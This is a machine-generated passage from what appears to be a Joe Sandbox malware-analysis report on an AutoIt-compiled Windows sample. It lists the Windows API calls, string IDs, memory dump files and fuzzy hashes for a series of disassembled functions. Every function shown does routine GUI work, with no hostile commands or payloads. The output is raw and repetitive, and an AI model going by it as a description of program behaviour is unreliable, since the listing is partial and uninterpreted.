                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01008D16
                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 01008D6E
                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 01008E1B
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 01008E3D
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01008E87
                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01008EB4
                                                • DrawMenuBar.USER32(?), ref: 01008EC3
                                                • SetWindowTextW.USER32(?,0000014E), ref: 01008EEB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                • String ID: 0
                                                • API String ID: 1073566785-4108050209
                                                • Opcode ID: 0e9e5568d1b440f900353413dd717a9b9dd8844bff7bc26df59f37238a6292f3
                                                • Instruction ID: f0c66d0aff2dd04087ac15f73d33ed1ca3597c4eb1df98732fa185471d1efc71
                                                • Opcode Fuzzy Hash: 0e9e5568d1b440f900353413dd717a9b9dd8844bff7bc26df59f37238a6292f3
                                                • Instruction Fuzzy Hash: 2BE16370900209ABEF62DF64CC84EEE7BB9FF09750F00819AFA95AA1D1DB758581DF50
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 010049CA
                                                • GetDesktopWindow.USER32 ref: 010049DF
                                                • GetWindowRect.USER32(00000000), ref: 010049E6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 01004A48
                                                • DestroyWindow.USER32(?), ref: 01004A74
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01004A9D
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01004ABB
                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01004AE1
                                                • SendMessageW.USER32(?,00000421,?,?), ref: 01004AF6
                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01004B09
                                                • IsWindowVisible.USER32(?), ref: 01004B29
                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01004B44
                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01004B58
                                                • GetWindowRect.USER32(?,?), ref: 01004B70
                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 01004B96
                                                • GetMonitorInfoW.USER32(00000000,?), ref: 01004BB0
                                                • CopyRect.USER32(?,?), ref: 01004BC7
                                                • SendMessageW.USER32(?,00000412,00000000), ref: 01004C32
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                • String ID: ($0$tooltips_class32
                                                • API String ID: 698492251-4156429822
                                                • Opcode ID: db4a990a595104e51f67223152fc7432be20b07493b4b33fbbe27f9db046fd6e
                                                • Instruction ID: 98ae7e605bec35cd80a98b880634a0766c225f6bbb9e620dbe57bb9e7485f70d
                                                • Opcode Fuzzy Hash: db4a990a595104e51f67223152fc7432be20b07493b4b33fbbe27f9db046fd6e
                                                • Instruction Fuzzy Hash: 19B1BB70608301AFE755DF68C844B6ABBE4BF89310F048A1CF6D99B291CB75E805CB59
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00FE44AC
                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00FE44D2
                                                • _wcscpy.LIBCMT ref: 00FE4500
                                                • _wcscmp.LIBCMT ref: 00FE450B
                                                • _wcscat.LIBCMT ref: 00FE4521
                                                • _wcsstr.LIBCMT ref: 00FE452C
                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00FE4548
                                                • _wcscat.LIBCMT ref: 00FE4591
                                                • _wcscat.LIBCMT ref: 00FE4598
                                                • _wcsncpy.LIBCMT ref: 00FE45C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                • API String ID: 699586101-1459072770
                                                • Opcode ID: bc58cc7526fdb747564686bb53ea6f18f453c62357b9de5f1028ad11821b2991
                                                • Instruction ID: e7e65c209b319a4e8943e6cdcfe72a89972777cda4e2afd626ba716e36c8887f
                                                • Opcode Fuzzy Hash: bc58cc7526fdb747564686bb53ea6f18f453c62357b9de5f1028ad11821b2991
                                                • Instruction Fuzzy Hash: 97412AB2A003017BDB11AB75DC43EBF77ACDF47310F04005EF945E6182EA38AA01B6A5
                                                APIs
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F828BC
                                                • GetSystemMetrics.USER32(00000007), ref: 00F828C4
                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F828EF
                                                • GetSystemMetrics.USER32(00000008), ref: 00F828F7
                                                • GetSystemMetrics.USER32(00000004), ref: 00F8291C
                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F82939
                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F82949
                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F8297C
                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F82990
                                                • GetClientRect.USER32(00000000,000000FF), ref: 00F829AE
                                                • GetStockObject.GDI32(00000011), ref: 00F829CA
                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F829D5
                                                  • Part of subcall function 00F82344: GetCursorPos.USER32(?), ref: 00F82357
                                                  • Part of subcall function 00F82344: ScreenToClient.USER32(010457B0,?), ref: 00F82374
                                                  • Part of subcall function 00F82344: GetAsyncKeyState.USER32(00000001), ref: 00F82399
                                                  • Part of subcall function 00F82344: GetAsyncKeyState.USER32(00000002), ref: 00F823A7
                                                • SetTimer.USER32(00000000,00000000,00000028,00F81256), ref: 00F829FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                • String ID: AutoIt v3 GUI
                                                • API String ID: 1458621304-248962490
                                                • Opcode ID: a86f0393a45f49a5f57659b266e5dfb85ea1e869c25e08656d0a9c8e9895dd22
                                                • Instruction ID: 69a091873cab4c266c0b5f3a90d47b4b732a33c351a3bdeaf581a1d100e7e8b6
                                                • Opcode Fuzzy Hash: a86f0393a45f49a5f57659b266e5dfb85ea1e869c25e08656d0a9c8e9895dd22
                                                • Instruction Fuzzy Hash: 46B19071A0020ADFDB25EFA8DC85BEE77B4FB08311F104129FA55E7294CB79A841EB50
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00FDA47A
                                                • __swprintf.LIBCMT ref: 00FDA51B
                                                • _wcscmp.LIBCMT ref: 00FDA52E
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FDA583
                                                • _wcscmp.LIBCMT ref: 00FDA5BF
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00FDA5F6
                                                • GetDlgCtrlID.USER32(?), ref: 00FDA648
                                                • GetWindowRect.USER32(?,?), ref: 00FDA67E
                                                • GetParent.USER32(?), ref: 00FDA69C
                                                • ScreenToClient.USER32(00000000), ref: 00FDA6A3
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00FDA71D
                                                • _wcscmp.LIBCMT ref: 00FDA731
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00FDA757
                                                • _wcscmp.LIBCMT ref: 00FDA76B
                                                  • Part of subcall function 00FA362C: _iswctype.LIBCMT ref: 00FA3634
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                • String ID: %s%u
                                                • API String ID: 3744389584-679674701
                                                • Opcode ID: 1071736e5380be92aee300294caadf46131278bb9d05a2d3d256ff60eb3a6bc6
                                                • Instruction ID: c03de9ea5bb2cadbf7fb36235764924cb94a4824890424a6747c241c1a28fbb7
                                                • Opcode Fuzzy Hash: 1071736e5380be92aee300294caadf46131278bb9d05a2d3d256ff60eb3a6bc6
                                                • Instruction Fuzzy Hash: 06A10471604306EFC715DF60C884FAAB7E9FF44320F08852AF999C2290DB34E945EB96
                                                APIs
                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 00FDAF18
                                                • _wcscmp.LIBCMT ref: 00FDAF29
                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 00FDAF51
                                                • CharUpperBuffW.USER32(?,00000000), ref: 00FDAF6E
                                                • _wcscmp.LIBCMT ref: 00FDAF8C
                                                • _wcsstr.LIBCMT ref: 00FDAF9D
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00FDAFD5
                                                • _wcscmp.LIBCMT ref: 00FDAFE5
                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 00FDB00C
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00FDB055
                                                • _wcscmp.LIBCMT ref: 00FDB065
                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 00FDB08D
                                                • GetWindowRect.USER32(00000004,?), ref: 00FDB0F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                • String ID: @$ThumbnailClass
                                                • API String ID: 1788623398-1539354611
                                                • Opcode ID: c4cc7b1e2c25f3135c6f28e06b57e4270cd0a0a7b3767e2d9131bf08798e0af6
                                                • Instruction ID: 0175dc9032766c8e026752d8e836d860ed238f477b55b60c2d9168f5dfe50995
                                                • Opcode Fuzzy Hash: c4cc7b1e2c25f3135c6f28e06b57e4270cd0a0a7b3767e2d9131bf08798e0af6
                                                • Instruction Fuzzy Hash: 5E81EF71408206DFDB11DF10C885FAA77E9EF44324F08846AFD858A296DB34DD49EB62
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                • API String ID: 1038674560-1810252412
                                                • Opcode ID: 8a488ed21d07efb530a078eb893ccb23af2d7ea5b258b37c1798dbc6e0cba839
                                                • Instruction ID: 6c786b9f8e07d6d793d202ec3b6334b5fbc71fa99dddda90e513023a2123bc87
                                                • Opcode Fuzzy Hash: 8a488ed21d07efb530a078eb893ccb23af2d7ea5b258b37c1798dbc6e0cba839
                                                • Instruction Fuzzy Hash: 0831E3B1A44609A7CB10FA91DD03FEE77AAAF90720F24001AF481751D1EF55AF04F656
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00FF5013
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00FF501E
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00FF5029
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00FF5034
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00FF503F
                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00FF504A
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00FF5055
                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00FF5060
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00FF506B
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00FF5076
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00FF5081
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00FF508C
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00FF5097
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00FF50A2
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00FF50AD
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00FF50B8
                                                • GetCursorInfo.USER32(?), ref: 00FF50C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Cursor$Load$Info
                                                • String ID:
                                                • API String ID: 2577412497-0
                                                • Opcode ID: 74ee9dabc19e1c55d8dc7893ce9df8d1ff8fb2524df7a7a67a21d794a0e53550
                                                • Instruction ID: 0820db51d1855545fbb3fa870ee60d5813f520acd8ddb41589c3507cb866931d
                                                • Opcode Fuzzy Hash: 74ee9dabc19e1c55d8dc7893ce9df8d1ff8fb2524df7a7a67a21d794a0e53550
                                                • Instruction Fuzzy Hash: BA3107B1D4831E6ADF109FB68C8996EBFE8FF04750F50452AA60DE7280DA78A5009F91
                                                APIs
                                                • _memset.LIBCMT ref: 0100A259
                                                • DestroyWindow.USER32(?,?), ref: 0100A2D3
                                                  • Part of subcall function 00F87BCC: _memmove.LIBCMT ref: 00F87C06
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0100A34D
                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0100A36F
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0100A382
                                                • DestroyWindow.USER32(00000000), ref: 0100A3A4
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F80000,00000000), ref: 0100A3DB
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0100A3F4
                                                • GetDesktopWindow.USER32 ref: 0100A40D
                                                • GetWindowRect.USER32(00000000), ref: 0100A414
                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0100A42C
                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0100A444
                                                  • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                • String ID: 0$tooltips_class32
                                                • API String ID: 1297703922-3619404913
                                                • Opcode ID: 5c2632b5443d31e2fa1a91dffa8fae011e15680b9ec1ead3396d7fe47c8be36f
                                                • Instruction ID: f6eefe1c7a9382b9826bcee9e700ed4f746587e1da3ec8976024fe15af72379f
                                                • Opcode Fuzzy Hash: 5c2632b5443d31e2fa1a91dffa8fae011e15680b9ec1ead3396d7fe47c8be36f
                                                • Instruction Fuzzy Hash: 21716774240305AFE722DF28CC49B6A7BE5FB88704F04455DFA859B2A1CB75E902DB52
                                                APIs
                                                  • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                • DragQueryPoint.SHELL32(?,?), ref: 0100C627
                                                  • Part of subcall function 0100AB37: ClientToScreen.USER32(?,?), ref: 0100AB60
                                                  • Part of subcall function 0100AB37: GetWindowRect.USER32(?,?), ref: 0100ABD6
                                                  • Part of subcall function 0100AB37: PtInRect.USER32(?,?,0100C014), ref: 0100ABE6
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0100C690
                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0100C69B
                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0100C6BE
                                                • _wcscat.LIBCMT ref: 0100C6EE
                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0100C705
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0100C71E
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0100C735
                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0100C757
                                                • DragFinish.SHELL32(?), ref: 0100C75E
                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0100C851
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                • API String ID: 169749273-3440237614
                                                • Opcode ID: 0e87a06fc7fea5b51cf42cc28781b85e25cd5dab872e2c48c20b24c281aa6551
                                                • Instruction ID: 36e5da6208ebd5ce807b727bd7ab528b213eed7290bd17c9be47ba2e19069a84
                                                • Opcode Fuzzy Hash: 0e87a06fc7fea5b51cf42cc28781b85e25cd5dab872e2c48c20b24c281aa6551
                                                • Instruction Fuzzy Hash: 4261AA71108302AFD712EF64CC85DAFBBE8EF89750F400A1EF591921A1DB75AA09DB52
                                                APIs
                                                • CharUpperBuffW.USER32(?,?), ref: 01004424
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0100446F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: BuffCharMessageSendUpper
                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                • API String ID: 3974292440-4258414348
                                                • Opcode ID: 31a9c021061e05ac039392c5f005dc881b7806db994a37872f41a2f5155aaf7d
                                                • Instruction ID: 6f59e1deb829385cdeddd3c80afe0beff4e96a6833748b493afedc205805813f
                                                • Opcode Fuzzy Hash: 31a9c021061e05ac039392c5f005dc881b7806db994a37872f41a2f5155aaf7d
                                                • Instruction Fuzzy Hash: 78917B702047019FDA05FF10C851A6EB7E1AF85354F08485CE9D29B3A2DB79EC09DB85
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0100B8B4
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,010091C2), ref: 0100B910
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0100B949
                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0100B98C
                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0100B9C3
                                                • FreeLibrary.KERNEL32(?), ref: 0100B9CF
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0100B9DF
                                                • DestroyIcon.USER32(?,?,?,?,?,010091C2), ref: 0100B9EE
                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0100BA0B
                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0100BA17
                                                  • Part of subcall function 00FA2EFD: __wcsicmp_l.LIBCMT ref: 00FA2F86
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
